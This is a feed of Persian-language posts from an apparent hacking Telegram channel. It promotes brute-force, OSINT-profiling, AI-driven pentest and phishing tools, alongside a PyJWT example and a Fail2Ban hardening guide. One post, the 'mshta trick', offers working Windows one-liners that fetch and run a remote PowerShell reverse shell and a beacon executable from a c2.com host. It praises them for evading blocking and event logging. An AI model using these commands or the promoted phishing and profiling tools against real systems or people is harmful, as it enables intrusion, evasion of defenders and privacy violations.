👩💻 Hydra
🔺هیدرا ابزاری است که امکان انتخاب خودکار نام کاربری و رمز عبور را برای تعداد زیادی از سرویسهای شبکه فراهم میکند. این ابزار از مجموعهای گسترده از پروتکلها پشتیبانی میکند، به طور انعطافپذیری برای سناریوهای مختلف قابل تنظیم است و اغلب برای بررسی امنیت اطلاعات کاربری در محیطهای آزمایشی استفاده میشود. علاوه بر این، هیدرا برای خودکارسازی حملات به سرویسهایی که از احراز هویت پایه استفاده میکنند، مناسب است.
⬅️ لینک گیتهاب
🔺هیدرا ابزاری است که امکان انتخاب خودکار نام کاربری و رمز عبور را برای تعداد زیادی از سرویسهای شبکه فراهم میکند. این ابزار از مجموعهای گسترده از پروتکلها پشتیبانی میکند، به طور انعطافپذیری برای سناریوهای مختلف قابل تنظیم است و اغلب برای بررسی امنیت اطلاعات کاربری در محیطهای آزمایشی استفاده میشود. علاوه بر این، هیدرا برای خودکارسازی حملات به سرویسهایی که از احراز هویت پایه استفاده میکنند، مناسب است.
⬅️ لینک گیتهاب
t.me/Hack4Man
❤6
🔒 بلکبیرد (Blackbird)
👁 یک ابزار OSINT برای جستجوی ردپاهای دیجیتال بر اساس نام کاربری و آدرس ایمیل در شبکههای اجتماعی.
بلکبیرد، حسابها را در بیش از 600 پلتفرم جستجو میکند، و با ترکیب بررسی در دسترس بودن پروفایلها، فیلتر کردن نتایج و تحلیل خودکار، کارایی بالایی دارد. این ابزار از خروجی دادهها در قالبهای PDF و CSV پشتیبانی میکند و همچنین از هوش مصنوعی برای پروفایلسازی اطلاعات یافتشده، مستقیماً از خط فرمان، استفاده میکند.
❗️ این ابزار برای متخصصان OSINT، محققان امنیت و تحلیلگران، برای خودکارسازی جمعآوری اطلاعات عمومی، بسیار مناسب است.
📱 گیتهاب (GitHub)
برچسبها: #ابزارها #هک #امنیت
👁 یک ابزار OSINT برای جستجوی ردپاهای دیجیتال بر اساس نام کاربری و آدرس ایمیل در شبکههای اجتماعی.
بلکبیرد، حسابها را در بیش از 600 پلتفرم جستجو میکند، و با ترکیب بررسی در دسترس بودن پروفایلها، فیلتر کردن نتایج و تحلیل خودکار، کارایی بالایی دارد. این ابزار از خروجی دادهها در قالبهای PDF و CSV پشتیبانی میکند و همچنین از هوش مصنوعی برای پروفایلسازی اطلاعات یافتشده، مستقیماً از خط فرمان، استفاده میکند.
❗️ این ابزار برای متخصصان OSINT، محققان امنیت و تحلیلگران، برای خودکارسازی جمعآوری اطلاعات عمومی، بسیار مناسب است.
📱 گیتهاب (GitHub)
برچسبها: #ابزارها #هک #امنیت
t.me/Hack4Man
❤2👍2
🕷؛TGSpyder: ابزاری OSINT برای جمعآوری دادهها از تلگرام
یک ابزار خط فرمان (CLI) برای تحلیلگران، روزنامهنگاران و محققان. این ابزار، اعضا، پیامها، لینکهای دعوت و فرادادهها را از گروهها/کانالهای عمومی و خصوصی جمعآوری میکند. تمام اطلاعات به فرمت CSV خروجی داده میشوند تا تجزیه و تحلیل آنها آسانتر باشد.
قابلیتها:
جمعآوری لیست اعضا (در صورت امکان)
خروجی گرفتن از تاریخچه پیامها
استخراج و حذف لینکهای تکراری t.me
جستجوی کاربر بر اساس نام کاربری یا شناسه (ID)
تعیین سازنده بستههای استیکر بر اساس شناسه (ID) مجموعه استیکرها
⚙ نحوه نصب:
⚙ نحوه استفاده اولیه:
خروجی: تمام دادهها در پوشهای به نام TGSpyder Output/ ذخیره میشوند و بر اساس پوشهها و زمانبندی مرتب شدهاند.
🔗 گیتهاب
یک ابزار خط فرمان (CLI) برای تحلیلگران، روزنامهنگاران و محققان. این ابزار، اعضا، پیامها، لینکهای دعوت و فرادادهها را از گروهها/کانالهای عمومی و خصوصی جمعآوری میکند. تمام اطلاعات به فرمت CSV خروجی داده میشوند تا تجزیه و تحلیل آنها آسانتر باشد.
قابلیتها:
جمعآوری لیست اعضا (در صورت امکان)
خروجی گرفتن از تاریخچه پیامها
استخراج و حذف لینکهای تکراری t.me
جستجوی کاربر بر اساس نام کاربری یا شناسه (ID)
تعیین سازنده بستههای استیکر بر اساس شناسه (ID) مجموعه استیکرها
⚙ نحوه نصب:
bash
git clone https://github.com/Darksight-Analytics/tgspyder.git
cd tgspyder
pip install -r requirements.txt
pip install -e .
⚙ نحوه استفاده اولیه:
bash
tgspyder https://t.me/examplegroup --members --chats
tgspyder --user @username
tgspyder --sticker-pack https://t.me/addstickers/packname
خروجی: تمام دادهها در پوشهای به نام TGSpyder Output/ ذخیره میشوند و بر اساس پوشهها و زمانبندی مرتب شدهاند.
🔗 گیتهاب
t.me/Hack4Man
❤4
🤖 ؛PentAGI: سیستم چندعاملی برای تست نفوذ خودکار
🔺این ابزار از عاملهایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده میکند. این عاملها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار میکنند، خود تصمیمگیری میکنند و وظایف را انجام میدهند.
⚙ قابلیتها:
معماری چندعاملی: عوامل مختلف مسئولیتهای مختلفی مانند جمعآوری اطلاعات، اسکن و بهرهبرداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدلهای کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیتهای عوامل به صورت زنده.
🔗 GitHub: PentAGI
🔺این ابزار از عاملهایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده میکند. این عاملها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار میکنند، خود تصمیمگیری میکنند و وظایف را انجام میدهند.
⚙ قابلیتها:
معماری چندعاملی: عوامل مختلف مسئولیتهای مختلفی مانند جمعآوری اطلاعات، اسکن و بهرهبرداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدلهای کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیتهای عوامل به صورت زنده.
🔗 GitHub: PentAGI
t.me/Hack4Man
🔥3❤2👍1
💡ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML
🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)
1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
این دستور cmd.exe را اجرا میکند و whoami را اجرا میکند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.
2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
🔺این اسکریپت را از حافظه دانلود و اجرا میکند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمیشود.
3⃣ دانلود بار مفید از یک سرور از راه دور
🔺ترکیب mshta و certutil به شما امکان میدهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.
🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)
1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()این دستور cmd.exe را اجرا میکند و whoami را اجرا میکند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.
2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()🔺این اسکریپت را از حافظه دانلود و اجرا میکند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمیشود.
3⃣ دانلود بار مفید از یک سرور از راه دور
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()🔺ترکیب mshta و certutil به شما امکان میدهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.
t.me/Hack4Man
❤5
؛Phishing Frenzy — یک چارچوب برای حملات فیشینگ
🔺؛Phishing Frenzy یک ابزار قدرتمند و متنباز است که برای ایجاد و مدیریت کمپینهای فیشینگ طراحی شده است.
🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار میدهد، از جمله ایجاد وبسایتهای جعلی، ارسال ایمیلهای فیشینگ و ردیابی نتایج حملات.
📌لینک گیت هاپ
🔺؛Phishing Frenzy یک ابزار قدرتمند و متنباز است که برای ایجاد و مدیریت کمپینهای فیشینگ طراحی شده است.
🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار میدهد، از جمله ایجاد وبسایتهای جعلی، ارسال ایمیلهای فیشینگ و ردیابی نتایج حملات.
📌لینک گیت هاپ
t.me/Hack4Man
📦 کتابخانه روز: PyJWT — کار با توکنهای وب JSON
؛JWT یک استاندارد برای انتقال امن دادهها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکنها است.
نصب:
مثال: ایجاد و بررسی توکن:
# 1. ایجاد توکن
# 2. بررسی توکن
؛JWT یک استاندارد برای انتقال امن دادهها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکنها است.
نصب:
pip install pyjwtمثال: ایجاد و بررسی توکن:
import jwt
import datetime
SECRET_KEY = "your-secret-key"
# 1. ایجاد توکن
payload = {
"user_id": 123,
"username": "alex",
"exp": datetime.datetime.now(datetime.UTC) + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(f"توکن: {token}")# 2. بررسی توکن
try:
decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
print(f"سلام، {decoded['username']}!")
except jwt.ExpiredSignatureError:
print("توکن منقضی شده است")
except jwt.InvalidTokenError:
print("توکن نامعتبر است")
t.me/Hack4Man
❤3
📊یک ترمینال، مانیتورینگ مستقل را ارائه میدهد – نیازی به اجرای برنامههایی مانند htop، iotop، nethogs و df نیست.
🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسکها، شبکه، دما و باتری؛ قابل اجرا در سیستمعاملهای Linux، macOS و Windows.
🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتبسازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.
🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسکها با قابلیت نمایش تاریخچه.
🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگنمایی زمانی.
📥 لینک به گیتهاپ
📌قابلیت سفارشیسازی در سطح تمها، ویجتها و فرکانس بهروزرسانی. از ماوس پشتیبانی میشود.
🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسکها، شبکه، دما و باتری؛ قابل اجرا در سیستمعاملهای Linux، macOS و Windows.
🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتبسازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.
🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسکها با قابلیت نمایش تاریخچه.
🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگنمایی زمانی.
📥 لینک به گیتهاپ
📌قابلیت سفارشیسازی در سطح تمها، ویجتها و فرکانس بهروزرسانی. از ماوس پشتیبانی میشود.
t.me/Hack4Man
❤2
🛡؛PatchMon: مدیریت متمرکز بهروزرسانیها در محیطهای سرور
🔺این ابزار برای مدیران سیستم و تیمهای امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز بهروزرسانیها را در سرورهای مختلف فراهم میکند. عوامل (agents) فقط از طریق کانالهای خروجی با سرور PatchMon ارتباط برقرار میکنند، بنابراین نیازی به باز کردن پورتها و مواجهه با خطرات امنیتی نیست.
قابلیتها:
🔗 GitHub: PatchMon/PatchMon
🔺این ابزار برای مدیران سیستم و تیمهای امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز بهروزرسانیها را در سرورهای مختلف فراهم میکند. عوامل (agents) فقط از طریق کانالهای خروجی با سرور PatchMon ارتباط برقرار میکنند، بنابراین نیازی به باز کردن پورتها و مواجهه با خطرات امنیتی نیست.
قابلیتها:
مدیریت متمرکز پچها در تعداد زیادی سرور
عوامل از طریق اتصالات خروجی کار میکنند (بدون نیاز به پورتهای باز)
نمایش کامل وضعیت بهروزرسانیها
خودکارسازی ایمن فرآیندها
🔗 GitHub: PatchMon/PatchMon
t.me/Hack4Man
❤3
✅ WhatsApp-OSINT
این ابزار، عکسهای پروفایل واتساپ را دریافت میکند، حسابهای تجاری را بررسی میکند، وضعیت کاربران را تعیین میکند و دستگاههای مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل میکند.
📁 زبان: پایتون
⭐️ تعداد ستارهها: 973
⬅️ لینک گیتهاب
این ابزار، عکسهای پروفایل واتساپ را دریافت میکند، حسابهای تجاری را بررسی میکند، وضعیت کاربران را تعیین میکند و دستگاههای مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل میکند.
📁 زبان: پایتون
⭐️ تعداد ستارهها: 973
⬅️ لینک گیتهاب
t.me/Hack4Man
❤3
🛡 پیکربندی Fail2Ban در لینوکس: محافظت از سرور در برابر حملات brute-force در 5 دقیقه
؛Fail2Ban، لاگهای سرویسهای سیستم را تحلیل میکند، فعالیتهای مشکوک را شناسایی کرده و به طور خودکار آدرسهای IP مهاجمان را مسدود میکند.
پیکربندی سریع:
# ایجاد فایل پیکربندی محلی
# ویرایش قوانین
پیکربندی برای SSH:
اجرا و مدیریت:
# شروع و فعالسازی خودکار
# بررسی وضعیت
# مشاهده آدرسهای IP مسدود شده
؛Fail2Ban، لاگهای سرویسهای سیستم را تحلیل میکند، فعالیتهای مشکوک را شناسایی کرده و به طور خودکار آدرسهای IP مهاجمان را مسدود میکند.
پیکربندی سریع:
# ایجاد فایل پیکربندی محلی
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
# ویرایش قوانین
sudo nano /etc/fail2ban/jail.local
پارامترهای پایه (در ابتدای فایل):
bantime = 10m # مدت زمان مسدودسازی
findtime = 10m # بازه زمانی تحلیل
maxretry = 5 # تعداد تلاشها قبل از مسدودسازی
پیکربندی برای SSH:
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 5
اجرا و مدیریت:
# شروع و فعالسازی خودکار
sudo systemctl start fail2ban
sudo systemctl enable fail2ban
# بررسی وضعیت
sudo systemctl status fail2ban
# مشاهده آدرسهای IP مسدود شده
sudo fail2ban-client status sshd
t.me/Hack4Man
❤7